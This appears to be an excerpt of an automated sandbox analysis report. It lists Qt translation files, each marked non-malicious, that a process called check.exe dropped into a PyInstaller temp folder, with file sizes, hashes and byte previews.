                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165170
                                                                                                                                                                                                                                      Entropy (8bit):4.679910767547088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                                                      MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                                                      SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                                                      SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                                                      SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):179941
                                                                                                                                                                                                                                      Entropy (8bit):4.720938209922096
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                                                      MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                                                      SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                                                      SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                                                      SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):166167
                                                                                                                                                                                                                                      Entropy (8bit):4.685212271435657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                                                      MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                                                      SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                                                      SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                                                      SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):189580
                                                                                                                                                                                                                                      Entropy (8bit):4.630160941635514
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                                                      MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                                                      SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                                                      SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                                                      SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):138690
                                                                                                                                                                                                                                      Entropy (8bit):5.515748942553918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                                                      MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                                                      SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                                                      SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                                                      SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160494
                                                                                                                                                                                                                                      Entropy (8bit):4.831791320613137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                                                      MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                                                      SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                                                      SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                                                      SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161172
                                                                                                                                                                                                                                      Entropy (8bit):4.680034416311688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                                                      MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                                                      SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                                                      SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                                                      SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):129911
                                                                                                                                                                                                                                      Entropy (8bit):5.802855391832282
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                                                      MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                                                      SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                                                      SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                                                      SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_ko.qm

                                                                                                                                                                                                                                      Download File
